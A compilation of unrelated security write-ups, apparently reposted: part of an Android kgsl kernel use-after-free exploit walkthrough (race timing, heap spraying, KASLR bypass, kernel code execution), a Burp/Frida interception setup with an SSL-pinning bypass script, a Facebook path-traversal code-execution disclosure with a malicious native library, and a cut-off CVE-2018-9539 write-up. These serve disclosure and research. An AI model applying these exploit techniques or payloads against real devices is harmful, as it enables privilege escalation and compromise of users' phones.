While source code can be misleading, as function inlining is common in kernel code (in fact ion_sgl_sync_mapped is inlined), the bottom line is that, at some point, the value of sgl will be cached in a register and the state of the original sg_table will no longer affect the code path. So if I first replace a->table with another sg_table, then deleting this new sg_table with sg_free_table will also cause its sgl to be deleted, though of course with clean up logic that sets sgl to NULL. But what if I set up another thread to delete this new sg_table after sgl has already been cached in a register? Then it won't matter that sgl is set to NULL, because the value in the register will still point to the original scatterlist, and as this scatterlist is now free'd, I get a use-after-free of sgl directly in ion_sgl_sync_mapped. I can then use sendmsg heap spraying to replace it with controlled data. There is one major problem with this though: the time between sgl being cached in a register and the time it is used again is very short, so it is normally not possible to fit the entire sg_table replacement sequence within such a short time frame, even racing the slowest cpu core against the fastest.

To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.

To ensure that each task (thread or process) has a fair share of cpu time, the linux kernel scheduler can interrupt a running task and put it on hold so that another task can run. This kind of interruption and stopping of a task is called preemption (the interrupted task is preempted). A task can also put itself on hold to allow another task to run, such as when it is waiting for some I/O input, or when it calls sched_yield(); in this case, we say that the task is voluntarily preempted. Preemption can happen inside syscalls such as ioctl calls as well, and on Android, tasks can be preempted except in some critical regions (e.g. while holding a spinlock). This means that a thread running the DMA_BUF_IOCTL_SYNC ioctl call can be interrupted after the sgl field is cached in a register and be put on hold. The default behavior, however, does not normally give us much control over when the preemption happens, nor over how long the task is put on hold.

To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task runs with the SCHED_NORMAL policy, but a lower priority policy, SCHED_IDLE, can also be set using the sched_setscheduler call (or pthread_setschedparam for threads). Furthermore, a task can be pinned to a cpu with sched_setaffinity, which only allows it to run on that specific cpu. By pinning two tasks, one with SCHED_NORMAL priority and the other with SCHED_IDLE priority, to the same cpu, it is possible to control the timing of the preemption as follows.

  1. First have the SCHED_NORMAL task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
  2. As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task has been waiting on. This will wake up the SCHED_NORMAL task, and because of its higher priority, the SCHED_IDLE task will be preempted and put on hold.
  3. The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.
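The affinity and policy setup described above uses standard scheduler syscalls. A minimal sketch (the helper name is mine) of placing the calling thread on a chosen cpu with a chosen policy:

```c
#define _GNU_SOURCE
#include <sched.h>
#include <string.h>

/* Illustrative helper: pin the calling thread to `cpu` and switch it to the
 * given scheduling policy (SCHED_IDLE for the task to be held, SCHED_OTHER,
 * i.e. "normal", for the task that will preempt it). */
static int pin_and_set_policy(int cpu, int policy)
{
	cpu_set_t set;
	CPU_ZERO(&set);
	CPU_SET(cpu, &set);
	if (sched_setaffinity(0, sizeof(set), &set) != 0)
		return -1;

	struct sched_param param;
	memset(&param, 0, sizeof(param));	/* priority 0 for both policies */
	return sched_setscheduler(0, policy, &param);
}
```

Lowering a thread to SCHED_IDLE and restricting its affinity both work unprivileged, which is what makes this technique usable from an untrusted app.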

In our case, the object replacement sequence goes as follows:

  1. Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
  2. First replace this free’d sg_table with another one that I can free easily, for example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns a sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn frees the sg_table. In practice, a little bit more heap manipulation is needed as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating a sg_table.
  3. Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
  4. Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
  5. The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
  6. The main task waits a suitable amount of time until sgl is cached in a register, then sends data to the pipe that the SCHED_NORMAL task is waiting on.
  7. Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
  8. The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free the sg_table, which will also free the object pointed to by sgl that is now cached in a register. The main task then replaces this object with controlled data using sendmsg heap spraying. This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
  9. The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.

The following figure illustrates what happens in an ideal world.


The following figure illustrates what happens in the real world.


Crazy as it seems, the race can actually be won almost every time, and the same timing parameters even work on both the Galaxy A71 and the Pixel 4. Even when the race fails, it does not result in a crash. It can, however, crash if the SCHED_IDLE task resumes too quickly. For some reason, I only managed to hold that task for about 10-20ms, and sometimes this is not long enough for the object replacement to complete.

The ion heap

Now that I’m able to replace the scatterlist with controlled data and make use of the read/write primitives in the section Allocating a SWIOTLB, it is time to think about what data I can place behind the DMA buffers.

To allocate DMA buffers, I need to use the ion allocator, which will allocate from an ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that allocates buffers with addresses greater than 32 bits. The locations of the various ion heaps can be seen in the kernel log during boot; the following is from a Galaxy A71:

[    0.626370] ION heap system created
[    0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[    0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[    0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[    0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[    0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[    0.631655] ION heap secure_carveout created
[    0.631669] ION heap secure_heap created
[    0.634265] cleancache enabled for rbin cleancache
[    0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000

As we can see, some ion heaps are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, other ion heaps, such as the system heap, do not have a fixed address; these are the heaps with addresses higher than 32 bits. For the exploit, I'll use the system heap.

DMA buffers on the system heap are allocated via the ion_system_heap_allocate function. It'll first try to allocate a buffer from a preallocated memory pool. If the pool is full, it'll allocate more pages using alloc_pages:

static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
	struct page *page = alloc_pages(pool->gfp_mask, pool->order);
	return page;

and recycle the pages back to the pool after the buffer is freed.

This latter case is more interesting, because if the memory is allocated from the initial pool, then any out-of-bounds read/write is likely to just hit other ion buffers, which only contain user space data. So let's take a look at alloc_pages.

The function alloc_pages allocates memory with page granularity using the buddy allocator. When using alloc_pages, the second parameter, order, specifies the size of the requested memory, and the allocator will return a memory block consisting of 2^order contiguous pages. In order to exploit an overflow of memory allocated by the buddy allocator (a DMA buffer from the system heap), I'll use the results from Exploiting the Linux kernel via packet sockets by Andrey Konovalov. The key point is that, while objects allocated from kmalloc and co. (i.e. kmalloc, kzalloc and kcalloc) are allocated via the slab allocator, which uses preallocated memory blocks (slabs) to allocate small objects, when the slabs run out, the slab allocator will use the buddy allocator to allocate a new slab. The output of /proc/slabinfo gives an indication of the size of slabs in pages.

kmalloc-8192        1036   1036   8192    4    8 : tunables    0    0    0 : slabdata    262    262      0
kmalloc-128       378675 384000    128   32    1 : tunables    0    0    0 : slabdata  12000  12000      0

In the above, the 5th numeric column (pagesperslab) indicates the size of the slabs in pages. So, for example, if the size 8192 bucket runs out, the slab allocator will ask the buddy allocator for a memory block of 8 pages, which is order 3 (2^3 = 8), to use as a new slab. So by exhausting the slabs, I can cause a new slab to be allocated in the same region as the ion system heap, which could allow me to over-read/write kernel objects allocated via kmalloc and co.
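The page-count to buddy-order conversion used above can be sketched as follows (my illustrative helper, not kernel code):

```c
/* Smallest buddy order whose block (2^order pages) fits `pages` pages;
 * e.g. an 8-page kmalloc-8192 slab needs an order-3 block. */
static int buddy_order_for_pages(unsigned int pages)
{
	int order = 0;
	while ((1u << order) < pages)
		order++;
	return order;
}
```

So a kmalloc-8192 slab (8 pages) requests order 3, while a single-page kmalloc-128 slab requests order 0.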

Manipulating the buddy allocator heap

As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and uses it to allocate memory of the appropriate order. When a certain order (n) runs out of memory, it'll look for free blocks in the next order up, split one in half and add the halves to the freelist of the requested order. If the next order is also full, it'll look in the next higher order, and so on. So by repeatedly allocating blocks of the same order, eventually the freelists will be exhausted and larger blocks will be broken up, which means that consecutive allocations will be adjacent to each other.

In fact, after some experimentation on a Pixel 4, it seems that after allocating a certain number of DMA buffers from the ion system heap, the allocations follow a very predictable pattern.

  1. The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
  2. Within each block, a new allocation will be adjacent to the previous one, with a higher address.
  3. When a 4MB block is filled, allocations will start at the beginning of the next block, which is right below the current 4MB block.

The following figure illustrates this pattern.


So by simply creating a large number of DMA buffers in the ion system heap, the last allocated buffer will likely sit in front of a "hole" of free memory, and the next allocation from the buddy allocator is likely to land inside this hole, provided the requested number of pages fits in it.

The heap spraying strategy is then very simple. First allocate a sufficient number of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large number of objects using kmalloc and co. to cause a new slab to be created. This new slab is then likely to fall into the hole behind the last allocated DMA buffer. Using the use-after-free to overflow this buffer then allows me to gain arbitrary read/write of the newly created slab.

Defeating KASLR and leaking address to DMA buffer

Initially, I was experimenting with the binder_open call, as it is easy to reach (just do open("/dev/binder")) and it will allocate a binder_proc struct:

static int binder_open(struct inode *nodp, struct file *filp)
{
	struct binder_proc *proc;
	...
	proc = kzalloc(sizeof(*proc), GFP_KERNEL);
	if (proc == NULL)
		return -ENOMEM;
	...
}

which is of size 560 and will persist until the /dev/binder file is closed, so it should be relatively easy to exhaust the kmalloc-1024 slab with this. However, after dumping the results of the out-of-bounds read, I noticed a recurring memory pattern:

00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff  h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000  ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000  ................

The 08af 5109 80ff ffff in the second part of the first line looks like an address that corresponds to kernel code. Indeed, it is the address of binder_fops:

# echo 0 > /proc/sys/kernel/kptr_restrict                                                                                                                                                
# cat /proc/kallsyms | grep ffffff800951af08                                                                                                                                                 
ffffff800951af08 r binder_fops

So it looks like these are the file structs of the binder files that I opened, and what I'm seeing here is the field f_ops that points to binder_fops. Moreover, the 32 bytes after f_ops are the same for every file struct of the same type, which offers a pattern to identify these files. So by reading the memory behind the DMA buffer and looking for this pattern, I can locate the file structs that belong to the binder devices that I opened.

Moreover, the file struct contains a mutex f_pos_lock, which contains a field wait_list:

struct mutex {
	atomic_long_t		owner;
	spinlock_t		wait_lock;
	...
	struct list_head	wait_list;
	...
};

which is a standard doubly linked list in Linux:

struct list_head {
	struct list_head *next, *prev;
};

When wait_list is initialized, the head of the list is just a pointer to itself, which means that by reading the next or prev pointer of wait_list, I can obtain the address of the file struct itself. This then allows me to work out the address of a DMA buffer that I control, because the offset between the file struct and the buffer is known (from its offset in the dumped data; in this example, the offset is 0x11020).
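The pointer arithmetic here is a simple subtraction; a sketch with illustrative values (the real offsetof values depend on the kernel build, and the helper names are mine):

```c
#include <stdint.h>
#include <stddef.h>

/* An empty, initialized wait_list points to itself, so a leaked `next`
 * pointer is the address of f_pos_lock.wait_list inside the file struct.
 * Subtracting the (build-specific) offset of that field recovers the
 * address of the file struct. */
static uint64_t file_struct_addr(uint64_t leaked_next, size_t wait_list_off)
{
	return leaked_next - wait_list_off;
}

/* The DMA buffer sits a known distance below the file struct in the dump
 * (0x11020 in the example above), so its address is another subtraction. */
static uint64_t dma_buf_addr(uint64_t file_addr, uint64_t delta_to_buf)
{
	return file_addr - delta_to_buf;
}
```
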

By using the address of binder_fops, it is easy to work out the KASLR slide and defeat KASLR, and by knowing the address of a controlled DMA buffer, I can use it to store a fake file_operations (the "vtable" of a file struct) and overwrite f_ops of my file struct to point to it. The path to arbitrary code execution is now clear.

  1. Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
  2. Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
  3. Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
  4. Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two to work out the address of the DMA buffer.
  5. Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_ops pointer of the file that corresponds to this file struct (which I own), so that it points to a fake file_operations struct stored in my DMA buffer. File operations performed on this file will then execute functions of my choice.

Since there is nothing special about binder files, in the actual exploit, I used /dev/null instead of /dev/binder, but the idea is the same. I’ll now explain how to do the last step in the above to gain arbitrary kernel code execution.

Getting arbitrary kernel code execution

To complete the exploit, I'll use "the ultimate ROP gadget" that was used in An iOS hacker tries Android by Brandon Azad (in fact I stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const struct bpf_insn *insn)

To invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This allows me to perform arbitrary memory loads/stores and to call arbitrary kernel functions with up to five arguments and a 64 bit return value.
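For reference, here is a hedged sketch of what such bytecode looks like. The instruction layout and opcodes below follow the public eBPF instruction set (struct bpf_insn in the kernel); the tiny program reads 64 bits from the address held in r1 (the first, ctx argument of __bpf_prog_run32) and returns it:

```c
#include <stdint.h>

/* Instruction layout from the eBPF instruction set (struct bpf_insn in the
 * kernel uapi headers); bitfield order shown is for little-endian. */
struct bpf_insn {
	uint8_t  code;
	uint8_t  dst_reg:4;
	uint8_t  src_reg:4;
	int16_t  off;
	int32_t  imm;
};

/* Two opcodes from the eBPF spec. */
#define BPF_LDX_MEM_DW 0x79	/* BPF_LDX | BPF_MEM | BPF_DW: dst = *(u64 *)(src + off) */
#define BPF_EXIT_INSN  0x95	/* BPF_JMP | BPF_EXIT: return r0 */

/* r0 = *(u64 *)(r1 + 0); return r0 — a 64-bit read at whatever address is
 * in r1 when the interpreter starts. */
static const struct bpf_insn read64_prog[] = {
	{ .code = BPF_LDX_MEM_DW, .dst_reg = 0, .src_reg = 1, .off = 0, .imm = 0 },
	{ .code = BPF_EXIT_INSN },
};
```

A fully arbitrary read would first load a 64-bit immediate address into a register (the two-instruction BPF_LD_IMM64 form) before the load; the principle is the same.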

There is, however, one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung's Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.

For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Bypasses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.

Without going into much detail about RKP, the two parts relevant to our situation are:

  1. RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
  2. RKP protects important data structures, such as the credentials of a process, so they are effectively read only.

Point one means that even though I can hijack the f_ops pointer of my file struct, I cannot jump to an arbitrary location; it is, however, still possible to jump to the start of any function. The practical implication is that while I can control which function I call, I may not be able to control the call arguments. Point two means that the usual shortcut of overwriting the credentials of my own process with those of a root process would not work. There are other post-exploitation techniques that can be used to overcome this, which I'll briefly explain later, but for the exploit of this post, I'll stop short at arbitrary kernel code execution.

In our situation, point one is actually not a big obstacle. The fact that I am able to hijack file_operations, which contains a whole array of possible calls that are thin wrappers of various syscalls, means that it is likely I can find a file operation with a 64 bit second argument that I control by making the appropriate syscall. In fact, I don't even need to look that far. The first operation, llseek, fits the bill:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
	...
};

This function takes a 64 bit integer, loff_t, as the second argument and can be invoked via the lseek64 syscall:

off64_t lseek64(int fd, off64_t offset, int whence);

where offset translates directly into loff_t in llseek. So by overwriting the f_ops pointer of my file to have its llseek field point to __bpf_prog_run32, I can invoke any eBPF program of my choice any time I call lseek64, without even needing to trigger the bug again. This gives me arbitrary kernel memory read/write and code execution.
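Triggering a program run is then just a seek. A hedged sketch, assuming f_ops has already been redirected (on an unmodified fd this is just an ordinary seek; the helper name is mine):

```c
#define _GNU_SOURCE		/* for lseek64 / off64_t */
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>

/* Once llseek points at __bpf_prog_run32, the struct file becomes ctx and
 * the 64-bit offset argument becomes the bytecode pointer. */
static long run_bpf_via_lseek(int fd, uint64_t bytecode_addr)
{
	return lseek64(fd, (off64_t)bytecode_addr, SEEK_SET);
}
```

The 64-bit return value of the eBPF program comes back as the syscall's return value, which is how read primitives report their result.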

As explained before, because of RKP it is not possible to simply overwrite the credentials of a process to become root, even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all the userspace data and processes are essentially under our control, and there are many ways to gain control over privileged user processes, such as those with system privilege, and effectively gain their privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique, mentioned in Galaxy's Meltdown - Exploiting SVE-2020-18610, is to overwrite the kernel stack of privileged processes to gain arbitrary kernel code execution as a privileged process. In short, there are many post exploitation techniques available at this stage to effectively root the phone.


In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was a result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean up logic being applied when an error happens. In this case, two common software errors, the ambiguity in the role of a type, and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.

While great progress has been made in sandboxing the userspace services in Android, the kernel, and in particular vendor drivers, remains a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to the full power of the kernel, which often results in a much shorter exploit chain.

The full exploit can be found here with some set up notes.

Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.

Android Security Testing: Setting up burp suite with Android VM/physical device


Original text by Sarvesh Sharma

Setting up the Burp suite with an android device is simple but a little tricky.

There are several ways to set up this environment.
1. Setting up Burp suite with Android VM (Needs Genymotion with virtual box).
2. Setting up Burp suite with Android physical Device (Needs Rooted android device).

Setting up Burp suite with Android VM (Needs Genymotion with virtual box) or with Android physical device.

Follow the below-mentioned steps:
i. Burp Suite.
ii. Genymotion (with VirtualBox) or a rooted Android physical device.
iii. adb tools. Click here to download.
iv. Setting up the proxy and certificate in the Android VM/device.
v. Frida installed on the host PC and the Frida server file to run Frida from the Android device (Python installed on the host machine (PC/laptop)).

i. Burp Suite.

Step 1: Certificate export: Open Burp Suite. Go to Proxy → Options → Proxy Listener → click on Import / export CA certificate → at the export section choose Certificate in DER format (e.g. cacert.der) → Click on Next → select any file name with the extension .der → Click on Next.

Burp Certificate export

Step 2: Go to the folder where you saved the Burp CA certificate → Change the extension from .der to .crt (e.g. cacert.crt) → and save it.

Step 3: Proxy setting in burp: Go to Proxy → Options → Proxy Listener → Click on Add → Select specific address and then select the IP of the device where burp is running, or simply select All interfaces (it will intercept all the traffic going through your system) → Enable this config.

Burp Proxy setting

ii. Genymotion (With virtual box.).

Step 1: Installing Genymotion: Download Genymotion (please select the version with VirtualBox) from Click here to download. → Register with Genymotion → Login → Click on the Add icon to add a new virtual device → Select the Android API according to the Android version → select a device from the list → Click on Next. (Recommended device and settings are in the attached screenshots.)

Genymotion Download
VM device select
VM device settings

Step 2: Install Open Gapps/Google Play Services:

  1. Power on the VM device.
  2. Click on Open Gapps icon on side bar. Follow the steps and it will automatically download and install Gapps in your VM device.


ii. Android Physical Device.

Note: We need an android device running Android OS version 6.0 or newer. Along with this we need to root the device (there are different ways to root a device; flashing Magisk is one of the popular and recommended ways to root an android device).

Step 1: Just plug the android device with a USB cable into the system where you want to capture the traffic.

iii. ADB tools. Click here to download:

You can download ADB tools from Click here. It will redirect to a page where you can select the ADB tools package according to your host machine. Select "SDK for Windows/Mac/Linux", accept the required terms and download. Extract the tools at any location (you will need to navigate to this location in cmd/terminal whenever you use the ADB tools). ADB tools are useful for doing out-of-the-box stuff on Android, like directly installing an app on the device from your laptop/PC or pushing any file directly to any location. (We will see the use of ADB in the upcoming steps.)

To globally install ADB tools: go to Start in Windows → search for "edit the system environment variables" → open it → in the Advanced tab → Environment Variables → select and edit PATH in system variables → Click on New → paste the path of the ADB tools directory (where you extracted the downloaded ADB tools zip).

iv. Setting up proxy and Certificate in Android VM/device.

Step 1: Setting up the proxy in Android: Power on the Android device/Android VM from Genymotion (if it shows an IP-related error at bootup, go to VirtualBox, start the device listed there and power it off after it gets an IP) → Go to Settings → Wi-Fi → long-press the Wi-Fi network listed there and select Modify Network → set Proxy to Manual → input the hostname as your host machine's IP and the port that was set for the proxy listener in the Burp proxy settings → Save.

Setup Proxy in android

Step 2: Setting up the burp Certificate in Android:

Open cmd/terminal. Move to the directory where ADB tools are present.

Push the burp certificate to the android device: There are two ways to add a certificate to an Android device.
i. Adding the certificate to user-defined certificates (recommended): push the burp certificate (with the .crt extension) using the command

"adb push path_to_certificate /sdcard/Download/"

Switch to the android device → Go to Settings → Security → Install from SD card → Select the certificate from the Download folder → it will ask you to enter a name; enter any name here (e.g. Burp CA) → It will ask you to add PIN security → Enter the security PIN → Next.

ii. Adding the certificate to system-defined certificates: Download and install OpenSSL from Click here. → open cmd and run the command
"openssl x509 -inform DER -in path_to_certificate/cacert.der -out path_to_certificate/cacert.pem"
then run
"openssl x509 -inform PEM -subject_hash_old -in cacert.pem"
It will show a hash value; copy and save it for further use.
Then run
"mv path_to_certificate/cacert.pem path_to_certificate/<hash>.0" or simply rename the file cacert.pem to <hash_value>.0.
Now copy the certificate to the device. Here is the list of commands to execute:
"adb remount" →
"adb push <hash_value>.0 /sdcard/Download" →
"adb shell" →
"mv /sdcard/Download/<hash_value>.0 /system/etc/security/cacerts/" →
"chmod 644 /system/etc/security/cacerts/<hash_value>.0"

Note: The benefit of adding the burp certificate to system-defined certificates is that we don't need to follow step v, which is the Frida setup. (But it's not a recommended way because sometimes it misses some API calls.)

v. Frida installation on the host PC and running the Frida server from the Android device.

Step 1: Installing Frida on the host PC: run the command "pip install frida-tools" to install Frida on the host PC.

Step 2: Running Frida from android device:

  1. Run the command “adb shell getprop ro.product.cpu.abi” to find out the processor architecture. →
  2. Download the Frida server file (from the Frida releases on GitHub). Select the file matching the processor architecture: the arm file for ARM, the x86 file for x86. →
  3. Extract the xz file → copy the file inside the extracted folder to the Android device with the command “adb push ./frida-server-12.x.y-android-xyz /data/local/tmp/” →
  4. Now disable SELinux (this is a one-time process): “adb shell” → in the shell: “su” → “setenforce 0”.
  5. Start the Frida server with: “adb shell” → “/data/local/tmp/frida-server-12.x.y-android-xyz &”
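The server-selection step above can be sketched as a small script. The abi value would really come from “adb shell getprop ro.product.cpu.abi” (a stand-in is hardcoded here), the 12.x.y version placeholder is kept as in the text, and the adb lines need a connected rooted device, so they are commented out.

```shell
# Map the device ABI to the matching frida-server build (12.x.y as in the text).
abi="arm64-v8a"   # stand-in; really: abi=$(adb shell getprop ro.product.cpu.abi)
case "$abi" in
  arm64-v8a) server="frida-server-12.x.y-android-arm64" ;;
  armeabi*)  server="frida-server-12.x.y-android-arm" ;;
  x86_64)    server="frida-server-12.x.y-android-x86_64" ;;
  x86)       server="frida-server-12.x.y-android-x86" ;;
esac
echo "$server"
# Not run here (needs a rooted device):
#   adb push "$server" /data/local/tmp/
#   adb shell su -c "setenforce 0"
#   adb shell "/data/local/tmp/$server &"
```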

Step 3: Creating the js file for the SSL pinning bypass.: This is needed to fix certificate-related errors and capture traffic in Burp Suite.
Create a js file named frida-ssl-pin.js, paste the following content into it, and save the file.

Java.perform(function() {

    var array_list = Java.use("java.util.ArrayList");
    // conscrypt's TrustManagerImpl is the class that implements checkTrustedRecursive
    var ApiClient = Java.use("com.android.org.conscrypt.TrustManagerImpl");

    ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
        // console.log("Bypassing SSL Pinning");
        var k = array_list.$new();
        return k;
    };

});

Step 4: Running the Frida receiver/client from the host machine.:

  1. Open the app on the Android device. Now find the process name by running “frida-ps -U” from cmd, and copy the process name.
  2. Run the Frida receiver/client with the command: “frida -U -l path_to_js_file/frida-ssl-pin.js --no-pause -f com.example.application”. This will open the app again, and now you are ready to capture traffic in Burp Suite.

Special Notes:

  1. Whenever the device restarts, we need to repeat the steps for running the Frida server on the Android device.
  2. In that case, we also need to restart the Frida receiver/client on the host machine.

Please let me know in case of any query….

Arbitrary code execution on Facebook for Android through download feature

Original text by Sayed Abdelhafiz


Recently I discovered an ACE on Facebook for Android that can be triggered by downloading a file from a group’s Files tab, without even opening the file.


While digging into the method that Facebook uses to download files from a group, I found that Facebook uses two different mechanisms. If the user downloads the file from the post itself, it is downloaded via a built-in Android service called DownloadManager; as far as I know, this is a safe way to download files. If the user decides to download the file from the Files tab, it is downloaded through a different method: in a nutshell, the application fetches the file and then saves it to the Download directory without any filtering.


Notice: the highlighted code is the fix that Facebook pushed. The vulnerable code did not include it.

Path traversal

The vulnerability was in the second method. Security measures were implemented on the server side when uploading files, but they were easy to bypass. The application simply fetches the downloaded file and saves it to, for example, /sdcard/Downloads/FILE_NAME without filtering FILE_NAME to protect against path traversal attacks. The first idea that came to my mind was to use path traversal to overwrite native libraries, which would lead to arbitrary code execution.
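A quick way to see why the unfiltered filename is dangerous: joining the attacker-controlled name onto the download directory and normalizing it escapes the directory entirely. This sketch only reproduces the path arithmetic (realpath -m normalizes a path without requiring it to exist):

```shell
base="/sdcard/Downloads"
fname="../../../sdcard/PoC"     # attacker-controlled FILE_NAME
realpath -m "$base/$fname"      # -> /sdcard/PoC, outside the download directory
```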

I set up my Burp Suite proxy, intercepted the upload file request, modified the filename to ../../../sdcard/PoC, and forwarded the request.

Web upload endpoint

Unfortunately it wasn’t enough because of the security measures on the server side; my path traversal payload was removed. I decided to play with the payload, but unfortunately no payload worked.


Bypass security measures. (Bypass?)

After many payloads, I wasn’t able to bypass that filter. I went back to browsing the application again, hoping to find something useful. And it came!


For the first time, I noticed that I can upload files via the Facebook mobile application. I set up a Burp Suite proxy on my phone, enabled the white-hat settings in the application to bypass SSL pinning, intercepted the upload file request, and modified the filename to ../../../sdcard/PoC. The file uploaded successfully, and my payload was in the filename now!

I tried to download the file from the post, but the DownloadManager service is safe, as I said, so the attack didn’t work. I navigated to the Files tab and downloaded the file. And here is our attack: my file was written to /sdcard/PoC!

As I was able to perform path traversal, I could now overwrite the native libraries and perform an ACE attack.


To exploit this, I started a new Android NDK project to create a native library, and put my evil code in the JNI_OnLoad function to make sure it executes when the library is loaded.

#include <jni.h>
#include <stdlib.h>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
    system("id > /data/data/com.facebook.katana/PoC");
    return JNI_VERSION_1_6;
}
I built the project to get my malicious library, then uploaded it via the mobile upload endpoint and renamed it to /../../../../../data/data/com.facebook.katana/lib-xzs/

Our exploit now is ready!

PoC Video:


April 29, 2020 at 5:57 AM: Submitted the report to Facebook.
April 29, 2020 at 11:20 AM: Facebook was able to reproduce it.
April 29, 2020 at 12:17 PM: Triaged.
June 16, 2020 at 12:54 PM: Vulnerability has been fixed.
July 15, 2020 at 5:11 PM: Facebook rewarded me $10,000!


I noticed people commenting on the bounty amount when I tweeted about the bug. Is it small? I was shocked, objected to it, and tried to discuss it with Facebook, but no way; they say the amount is fair and they won’t be revisiting the decision. As Neal told me: “Spencer provided you with insight into how we determined the bounty for this issue. We believe the amount awarded is reasonable and will not be revisiting this decision.”

It’s up to you to decide before you report your vulnerabilities! Vendor or?

Have a nice day!

CVE-2018-9539: Use-after-free vulnerability in privileged Android service

( Original text by Tamir Zahavi-Brunner )

As part of our platform research in Zimperium zLabs, I have recently discovered a vulnerability in a privileged Android service called MediaCasService and reported it to Google. Google designated it as CVE-2018-9539 and patched it in the November security update (2018-11-01 patch level).

In this blog post, I will describe the technical details of this use-after-free vulnerability, along with some background information and the details of the proof-of-concept I wrote that triggers it. Link to the full proof-of-concept is available at the end of the blog post.


The Android service called MediaCasService (AKA android.hardware.cas) allows apps to descramble protected media streams. The communication between apps and MediaCasService is performed mostly through two interfaces/objects: Cas, which manages the keys (reference: MediaCas Java API), and Descrambler, which performs the actual descramble operation (reference: MediaDescrambler Java API).

Underneath the MediaCasService API, the actual operations are performed by a plugin, which is a library that the service loads. In our case, the relevant plugin is the ClearKey plugin, whose library is

In order to descramble data, apps need to use both the Cas object and the Descrambler object. The Descrambler object is used for the actual descramble operation, but in order to do that, it needs to be linked to a session with a key. In order to manage sessions and add keys to them, the Cas object is used.

Internally, the ClearKey plugin manages sessions in the ClearKeySessionLibrary, which is essentially a hash table. The keys are session IDs, while the values are the session objects themselves. Apps receive the session IDs which they can use to refer to the session objects in the service.

After creating a session and attaching a key to it, apps are in charge of linking it to a Descrambler object. The descrambler object has a member called mCASSession, which is a reference to its session object and is used in descramble operations. While there is no obligation to do so, once a Descrambler session is linked with a session object, an app can remove that session from the session library. In that case, the only reference to the session object will be through the Descrambler’s mCASSession.

An important note is that references to session objects are held through strong pointers (sp class). Hence, each session object has a reference count, and once that reference count reaches zero the session object is released. References are either through the session library or through a Descrambler’s mCASSession.

The vulnerability

Let’s take a look at ClearKey’s descramble method:

